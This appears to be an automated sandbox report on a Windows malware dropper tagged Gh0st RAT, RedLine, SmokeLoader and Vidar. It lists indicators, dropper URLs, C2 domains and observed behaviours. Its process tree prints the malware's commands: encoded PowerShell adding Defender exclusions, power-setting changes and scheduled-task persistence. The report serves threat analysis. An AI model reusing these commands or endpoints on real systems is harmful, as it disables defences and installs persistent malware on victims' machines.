gh0strat | 9b6573b930e72d319ef4efa0975ff1b59673f96633a03d5e338bc8d7418418f4

Resubmissions

11-05-2023 23:45

230511-3r21vaba37 10

11-05-2023 14:55

230511-saw36afh91 10

10-05-2023 18:44

230510-xdkazshg76 10

08-05-2023 20:41

230508-zgd99aed8v 10

Analysis

max time kernel
375s
max time network
378s
platform
windows10-1703_x64
resource
win10-20230220-en
resource tags

arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
submitted
11-05-2023 23:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

005bcf051418d05c2750b593278c9fc8.exe
Size

6KB
MD5

005bcf051418d05c2750b593278c9fc8
SHA1

3425e499c953eefad59edde4f83e1c04687799c7
SHA256

9b6573b930e72d319ef4efa0975ff1b59673f96633a03d5e338bc8d7418418f4
SHA512

25faa9966fa531c948c00c2454427220ba79d28230fdac1aec0a5793983d07ff2d71dba0b122bcc5bc24abb1fd18586fe2d4215d796eb9b0ba1d55099538f679
SSDEEP

96:MEOIQNVjrXcWD7RtwkYv1X5Yp7svNzNt:MFIojrsWHnwkYv1XyIn

Score

10^/10

gh0strat redline smokeloader vidar sprg backdoor evasion infostealer pyinstaller ransomware rat spyware stealer trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.23/r.png

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.23/file.png

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.23/o.png

Extracted

Family

smokeloader

Botnet

sprg

Extracted

Family

smokeloader

Version

2022

http://hoh0aeghwugh2gie.com/

http://hie7doodohpae4na.com/

http://aek0aicifaloh1yo.com/

http://yic0oosaeiy7ahng.com/

http://wa5zu7sekai8xeih.com/

rc4.i32

Signatures

Gh0st RAT payload 1 IoCs

Processes:

resource yara_rule

C:\dan.exe family_gh0strat
Gh0strat
Gh0st RAT is a remote access tool (RAT) with its source code public and it has been used by multiple Chinese groups.
rat gh0strat
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

resource	yara_rule
C:\dan.exe	family_gh0strat

RedLine payload 30 IoCs

Processes:

resource	yara_rule
behavioral1/memory/4852-159-0x0000000004200000-0x0000000004248000-memory.dmp	family_redline
behavioral1/memory/4852-163-0x0000000006930000-0x0000000006976000-memory.dmp	family_redline
behavioral1/memory/4852-176-0x0000000006930000-0x0000000006971000-memory.dmp	family_redline
behavioral1/memory/4852-177-0x0000000006930000-0x0000000006971000-memory.dmp	family_redline
behavioral1/memory/4852-179-0x0000000006930000-0x0000000006971000-memory.dmp	family_redline
behavioral1/memory/4852-181-0x0000000006930000-0x0000000006971000-memory.dmp	family_redline
behavioral1/memory/4852-183-0x0000000006930000-0x0000000006971000-memory.dmp	family_redline
behavioral1/memory/4852-188-0x0000000006930000-0x0000000006971000-memory.dmp	family_redline
behavioral1/memory/4852-186-0x0000000006930000-0x0000000006971000-memory.dmp	family_redline
behavioral1/memory/4852-190-0x0000000006930000-0x0000000006971000-memory.dmp	family_redline
behavioral1/memory/4852-192-0x0000000006930000-0x0000000006971000-memory.dmp	family_redline
behavioral1/memory/4852-194-0x0000000006930000-0x0000000006971000-memory.dmp	family_redline
behavioral1/memory/4852-196-0x0000000006930000-0x0000000006971000-memory.dmp	family_redline
behavioral1/memory/4852-198-0x0000000006930000-0x0000000006971000-memory.dmp	family_redline
behavioral1/memory/4852-200-0x0000000006930000-0x0000000006971000-memory.dmp	family_redline
behavioral1/memory/4852-202-0x0000000006930000-0x0000000006971000-memory.dmp	family_redline
behavioral1/memory/4852-204-0x0000000006930000-0x0000000006971000-memory.dmp	family_redline
behavioral1/memory/4852-206-0x0000000006930000-0x0000000006971000-memory.dmp	family_redline
behavioral1/memory/4852-209-0x0000000006930000-0x0000000006971000-memory.dmp	family_redline
behavioral1/memory/4852-214-0x0000000006930000-0x0000000006971000-memory.dmp	family_redline
behavioral1/memory/4852-216-0x0000000006930000-0x0000000006971000-memory.dmp	family_redline
behavioral1/memory/4852-218-0x0000000006930000-0x0000000006971000-memory.dmp	family_redline
behavioral1/memory/4852-220-0x0000000006930000-0x0000000006971000-memory.dmp	family_redline
behavioral1/memory/4852-222-0x0000000006930000-0x0000000006971000-memory.dmp	family_redline
behavioral1/memory/4852-224-0x0000000006930000-0x0000000006971000-memory.dmp	family_redline
behavioral1/memory/4852-226-0x0000000006930000-0x0000000006971000-memory.dmp	family_redline
behavioral1/memory/4852-228-0x0000000006930000-0x0000000006971000-memory.dmp	family_redline
behavioral1/memory/4852-230-0x0000000006930000-0x0000000006971000-memory.dmp	family_redline
behavioral1/memory/4852-234-0x0000000006930000-0x0000000006971000-memory.dmp	family_redline
behavioral1/memory/4960-944-0x0000000005380000-0x0000000005390000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Executes dropped EXE 7 IoCs

Processes:

s.exehgjhkhkkyuuiii.exenewbuild.exe134.exepmZdtegi.exepmZdtegi.exesetup.exe

pid process

3896 s.exe
3828 hgjhkhkkyuuiii.exe
1100 newbuild.exe
4852 134.exe
5008 pmZdtegi.exe
2164 pmZdtegi.exe
4304 setup.exe
Loads dropped DLL 2 IoCs

Processes:

newbuild.exe

pid process

1100 newbuild.exe
1100 newbuild.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
1100	newbuild.exe
1100	newbuild.exe

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\SETUP_3526\Engine.exe	upx
C:\Users\Admin\AppData\Local\Temp\SETUP_3526\Engine.exe	upx
C:\Users\Admin\AppData\Local\Temp\SETUP_3555\Engine.exe	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 10 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
466	api.ipify.org
80	ip-api.com
186	api.ipify.org
194	api.ipify.org
196	api.ipify.org
198	api.ipify.org
370	ipinfo.io
429	checkip.dyndns.org
183	api.ipify.org
463	api.ipify.org

Suspicious use of SetThreadContext 2 IoCs

Processes:

hgjhkhkkyuuiii.exepmZdtegi.exe

description	pid	process	target process
PID 3828 set thread context of 3612	3828	hgjhkhkkyuuiii.exe	AppLaunch.exe
PID 5008 set thread context of 2164	5008	pmZdtegi.exe	pmZdtegi.exe

Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

876 sc.exe
5272 sc.exe
1636 sc.exe
3496 sc.exe
1632 sc.exe

pid	process
876	sc.exe
5272	sc.exe
1636	sc.exe
3496	sc.exe
1632	sc.exe

Detects Pyinstaller 3 IoCs

pyinstaller

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\a\shell.exe	pyinstaller
C:\Users\Admin\AppData\Local\Temp\a\shell.exe	pyinstaller
C:\Users\Admin\AppData\Local\Temp\a\shell.exe	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 12 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4620	3828	WerFault.exe	hgjhkhkkyuuiii.exe
720	560	WerFault.exe	Build2.exe
5896	2144	WerFault.exe	SecureHorizons.exe
5192	916	WerFault.exe	dtsmsys.exe
6204	924	WerFault.exe	vbc (3).exe
4352	4492	WerFault.exe	forscan.exe
6904	5932	WerFault.exe	vhttd.exe
876	5496	WerFault.exe	setup (3).exe
5252	5496	WerFault.exe	setup (3).exe
3412	5496	WerFault.exe	setup (3).exe
5624	5496	WerFault.exe	setup (3).exe
6980	5496	WerFault.exe	setup (3).exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

s.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	s.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	s.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	s.exe

Creates scheduled task(s) 1 TTPs 17 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
4368	schtasks.exe
312	schtasks.exe
4684	schtasks.exe
4116	schtasks.exe
5308	schtasks.exe
3976	schtasks.exe
1104	schtasks.exe
5348	schtasks.exe
6384	schtasks.exe
4680	schtasks.exe
4008	schtasks.exe
3568	schtasks.exe
5164	schtasks.exe
3204	schtasks.exe
1540	schtasks.exe
2736	schtasks.exe
3532	schtasks.exe

Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

6984 vssadmin.exe
Kills process with taskkill 6 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

4020 taskkill.exe
6896 taskkill.exe
7532 taskkill.exe
5492 taskkill.exe
4140 taskkill.exe
6576 taskkill.exe

pid	process
6984	vssadmin.exe

pid	process
4020	taskkill.exe
6896	taskkill.exe
7532	taskkill.exe
5492	taskkill.exe
4140	taskkill.exe
6576	taskkill.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

s.exeAppLaunch.exepowershell.exe

pid	process
3896	s.exe
3896	s.exe
3196
3196
3612	AppLaunch.exe
3196
3196
3196
3196
3196
3196
3196
3196
3196
3196
3196
3196
3196
3196
3196
3196
3196
3196
3196
3196
3196
3196
3196
3196
3196
3196
3196
3196
3196
3196
3196
3196
3196
3196
3196
3196
3196
3196
3196
3196
3196
3196
3196
3196
3196
3196
3196
3196
3196
3196
1120	powershell.exe
3196
3196
3196
3196
3196
3196
3196
3196

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

3196
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

s.exe

pid process

3896 s.exe

pid	process
3196

Suspicious use of AdjustPrivilegeToken 21 IoCs

Processes:

005bcf051418d05c2750b593278c9fc8.exe134.exeAppLaunch.exepowershell.exepmZdtegi.exe

description	pid	process
Token: SeDebugPrivilege	4128	005bcf051418d05c2750b593278c9fc8.exe
Token: SeDebugPrivilege	4852	134.exe
Token: SeDebugPrivilege	3612	AppLaunch.exe
Token: SeShutdownPrivilege	3196
Token: SeCreatePagefilePrivilege	3196
Token: SeShutdownPrivilege	3196
Token: SeCreatePagefilePrivilege	3196
Token: SeShutdownPrivilege	3196
Token: SeCreatePagefilePrivilege	3196
Token: SeShutdownPrivilege	3196
Token: SeCreatePagefilePrivilege	3196
Token: SeShutdownPrivilege	3196
Token: SeCreatePagefilePrivilege	3196
Token: SeShutdownPrivilege	3196
Token: SeCreatePagefilePrivilege	3196
Token: SeShutdownPrivilege	3196
Token: SeCreatePagefilePrivilege	3196
Token: SeShutdownPrivilege	3196
Token: SeCreatePagefilePrivilege	3196
Token: SeDebugPrivilege	1120	powershell.exe
Token: SeDebugPrivilege	5008	pmZdtegi.exe

Suspicious use of WriteProcessMemory 34 IoCs

Processes:

005bcf051418d05c2750b593278c9fc8.exehgjhkhkkyuuiii.exeAppLaunch.execmd.exepmZdtegi.exe

description	pid	process	target process
PID 4128 wrote to memory of 3896	4128	005bcf051418d05c2750b593278c9fc8.exe	s.exe
PID 4128 wrote to memory of 3896	4128	005bcf051418d05c2750b593278c9fc8.exe	s.exe
PID 4128 wrote to memory of 3896	4128	005bcf051418d05c2750b593278c9fc8.exe	s.exe
PID 4128 wrote to memory of 3828	4128	005bcf051418d05c2750b593278c9fc8.exe	hgjhkhkkyuuiii.exe
PID 4128 wrote to memory of 3828	4128	005bcf051418d05c2750b593278c9fc8.exe	hgjhkhkkyuuiii.exe
PID 4128 wrote to memory of 3828	4128	005bcf051418d05c2750b593278c9fc8.exe	hgjhkhkkyuuiii.exe
PID 3828 wrote to memory of 3612	3828	hgjhkhkkyuuiii.exe	AppLaunch.exe
PID 3828 wrote to memory of 3612	3828	hgjhkhkkyuuiii.exe	AppLaunch.exe
PID 3828 wrote to memory of 3612	3828	hgjhkhkkyuuiii.exe	AppLaunch.exe
PID 3828 wrote to memory of 3612	3828	hgjhkhkkyuuiii.exe	AppLaunch.exe
PID 3828 wrote to memory of 3612	3828	hgjhkhkkyuuiii.exe	AppLaunch.exe
PID 4128 wrote to memory of 1100	4128	005bcf051418d05c2750b593278c9fc8.exe	newbuild.exe
PID 4128 wrote to memory of 1100	4128	005bcf051418d05c2750b593278c9fc8.exe	newbuild.exe
PID 4128 wrote to memory of 1100	4128	005bcf051418d05c2750b593278c9fc8.exe	newbuild.exe
PID 4128 wrote to memory of 4852	4128	005bcf051418d05c2750b593278c9fc8.exe	134.exe
PID 4128 wrote to memory of 4852	4128	005bcf051418d05c2750b593278c9fc8.exe	134.exe
PID 4128 wrote to memory of 4852	4128	005bcf051418d05c2750b593278c9fc8.exe	134.exe
PID 3612 wrote to memory of 772	3612	AppLaunch.exe	cmd.exe
PID 3612 wrote to memory of 772	3612	AppLaunch.exe	cmd.exe
PID 3612 wrote to memory of 772	3612	AppLaunch.exe	cmd.exe
PID 4128 wrote to memory of 5008	4128	005bcf051418d05c2750b593278c9fc8.exe	pmZdtegi.exe
PID 4128 wrote to memory of 5008	4128	005bcf051418d05c2750b593278c9fc8.exe	pmZdtegi.exe
PID 772 wrote to memory of 1120	772	cmd.exe	powershell.exe
PID 772 wrote to memory of 1120	772	cmd.exe	powershell.exe
PID 772 wrote to memory of 1120	772	cmd.exe	powershell.exe
PID 5008 wrote to memory of 2164	5008	pmZdtegi.exe	pmZdtegi.exe
PID 5008 wrote to memory of 2164	5008	pmZdtegi.exe	pmZdtegi.exe
PID 5008 wrote to memory of 2164	5008	pmZdtegi.exe	pmZdtegi.exe
PID 5008 wrote to memory of 2164	5008	pmZdtegi.exe	pmZdtegi.exe
PID 5008 wrote to memory of 2164	5008	pmZdtegi.exe	pmZdtegi.exe
PID 5008 wrote to memory of 2164	5008	pmZdtegi.exe	pmZdtegi.exe
PID 4128 wrote to memory of 4304	4128	005bcf051418d05c2750b593278c9fc8.exe	setup.exe
PID 4128 wrote to memory of 4304	4128	005bcf051418d05c2750b593278c9fc8.exe	setup.exe
PID 4128 wrote to memory of 4304	4128	005bcf051418d05c2750b593278c9fc8.exe	setup.exe

C:\Users\Admin\AppData\Local\Temp\005bcf051418d05c2750b593278c9fc8.exe
"C:\Users\Admin\AppData\Local\Temp\005bcf051418d05c2750b593278c9fc8.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4128

C:\Users\Admin\AppData\Local\Temp\a\s.exe
"C:\Users\Admin\AppData\Local\Temp\a\s.exe"
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3896

C:\Users\Admin\AppData\Local\Temp\a\hgjhkhkkyuuiii.exe
"C:\Users\Admin\AppData\Local\Temp\a\hgjhkhkkyuuiii.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3828

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3612

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C powershell -EncodedCommand "PAAjAFMANgBMAHkASABrAGcAawBrADYANAA0ADMAYQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAQQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBHAG0ARwAxAEEATgBGACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEEAcwBzACMAPgA="
4⤵
- Suspicious use of WriteProcessMemory
PID:772

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAFMANgBMAHkASABrAGcAawBrADYANAA0ADMAYQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAQQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBHAG0ARwAxAEEATgBGACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEEAcwBzACMAPgA="
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1120

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & echo эtОqшvtДAzsryЮ & SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo
4⤵
PID:3096

C:\Windows\SysWOW64\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
5⤵
PID:4456

C:\Windows\SysWOW64\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
5⤵
PID:4892

C:\Windows\SysWOW64\powercfg.exe
powercfg /x -standby-timeout-ac 0
5⤵
PID:2732

C:\Windows\SysWOW64\powercfg.exe
powercfg /x -standby-timeout-dc 0
5⤵
PID:4140

C:\Windows\SysWOW64\powercfg.exe
powercfg /hibernate off
5⤵
PID:3232

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
5⤵
- Creates scheduled task(s)
PID:4684

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C powershell -EncodedCommand "PAAjADoEbQB4ACEEMQBLBBMEHQQhBCMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbAA0BEIAPQRJBCMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwBVADEAPAQwBFUAGwR3AGcAWABVABgEOARxACwEIwA+ACAAQAAoACAAPAAjAGgAdAByAEAEOwQ1ACEEEAQTBB8EPAQZBEsAIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjACQEegAoBBMELQQaBE0EFgQYBHMAMAQWBHIASAQjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAPgRrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjACIENABlADkEagAUBBYEMgAxAEkEGwQjAD4A"
4⤵
PID:1432

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjADoEbQB4ACEEMQBLBBMEHQQhBCMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbAA0BEIAPQRJBCMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwBVADEAPAQwBFUAGwR3AGcAWABVABgEOARxACwEIwA+ACAAQAAoACAAPAAjAGgAdAByAEAEOwQ1ACEEEAQTBB8EPAQZBEsAIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjACQEegAoBBMELQQaBE0EFgQYBHMAMAQWBHIASAQjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAPgRrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjACIENABlADkEagAUBBYEMgAxAEkEGwQjAD4A"
5⤵
PID:4964

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C powershell -EncodedCommand "PAAjAEgEQQAaBBkEFQQeBCMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZQBNBFIAWQAXBEwEIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAFYAcAAqBEYAJARCABsEHwRMBGoAeAAaBFcAHwQjAD4AIABAACgAIAA8ACMATQA9BEcATARtAEsAEgQyBE4EaAAbBCMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBNAGoAJwRwABYETwQxBDQEdABOBDsEHgRMACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBPBDkAPARJBGIARgQwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAFQAKQRyAG0APwRFBCMAPgA="
4⤵
PID:4620

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAEgEQQAaBBkEFQQeBCMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZQBNBFIAWQAXBEwEIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAFYAcAAqBEYAJARCABsEHwRMBGoAeAAaBFcAHwQjAD4AIABAACgAIAA8ACMATQA9BEcATARtAEsAEgQyBE4EaAAbBCMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBNAGoAJwRwABYETwQxBDQEdABOBDsEHgRMACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBPBDkAPARJBGIARgQwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAFQAKQRyAG0APwRFBCMAPgA="
5⤵
PID:2212

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C powershell -EncodedCommand "PAAjAGMATQAZBHYAKARNBEsAUgBNAGkAFgQTBD0ETgA5ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAFAQuBFUAKAQzBHYAQwBVAE8EGAQgBHoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAEkEGgQjAD4AIABAACgAIAA8ACMAaABxADgENABGBFAAbQAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMATABFAD8EYgBLBC8EdwARBBQEGAQjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAMgAuBEQAWQAkBGoAVgA5ACQEHQRrAFIATgRLACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAE4EWgBLBGUASQBKBB4EMQRDBCMAPgA="
4⤵
PID:3796

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAGMATQAZBHYAKARNBEsAUgBNAGkAFgQTBD0ETgA5ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAFAQuBFUAKAQzBHYAQwBVAE8EGAQgBHoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAEkEGgQjAD4AIABAACgAIAA8ACMAaABxADgENABGBFAAbQAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMATABFAD8EYgBLBC8EdwARBBQEGAQjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAMgAuBEQAWQAkBGoAVgA5ACQEHQRrAFIATgRLACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAE4EWgBLBGUASQBKBB4EMQRDBCMAPgA="
5⤵
PID:4960

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C powershell -EncodedCommand "PAAjAFIAegA/BFAAUwA+BCMEQQBOAGUAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBrAG8AMAQ+BEoEOAASBB4EIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjADQESABHBCMAPgAgAEAAKAAgADwAIwAwBGYARQBkAFoAHgRNBFgAcgBsAE4AIARaAE0EIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjADIETgRTAHoAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjAG0AagBMBBkERgBGBBsETQBEBEQELQRrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEwEOARNAFkATgQTBDEAVQBmACMAPgA="
4⤵
PID:4260

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAFIAegA/BFAAUwA+BCMEQQBOAGUAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBrAG8AMAQ+BEoEOAASBB4EIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjADQESABHBCMAPgAgAEAAKAAgADwAIwAwBGYARQBkAFoAHgRNBFgAcgBsAE4AIARaAE0EIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjADIETgRTAHoAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjAG0AagBMBBkERgBGBBsETQBEBEQELQRrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEwEOARNAFkATgQTBDEAVQBmACMAPgA="
5⤵
PID:1556

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C powershell -EncodedCommand "PAAjAG8ATQQrBGgAPwQjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADAEPAQQBEkEMARKAB0EcQBHBGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAEQARgBHBCMAPgAgAEAAKAAgADwAIwBEBBAETgAbBBUESABMBD8EOQBYAHIAIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAEIAFQQ5ADIAFQQgBDIEFgQ5BEkAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjAB8EKQRNBDQEbABlAGEAPQRFAEMESQQ6BCgEIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdQAqBFUAIARrAFcAdQA4AE8EIwA+AA=="
4⤵
PID:704

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAG8ATQQrBGgAPwQjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADAEPAQQBEkEMARKAB0EcQBHBGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAEQARgBHBCMAPgAgAEAAKAAgADwAIwBEBBAETgAbBBUESABMBD8EOQBYAHIAIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAEIAFQQ5ADIAFQQgBDIEFgQ5BEkAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjAB8EKQRNBDQEbABlAGEAPQRFAEMESQQ6BCgEIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdQAqBFUAIARrAFcAdQA4AE8EIwA+AA=="
5⤵
PID:4608

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C echo EgйтыvпШ8ОtKФуEеysW & SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo m6ЕКmoК9z
4⤵
PID:4528

C:\Windows\SysWOW64\schtasks.exe
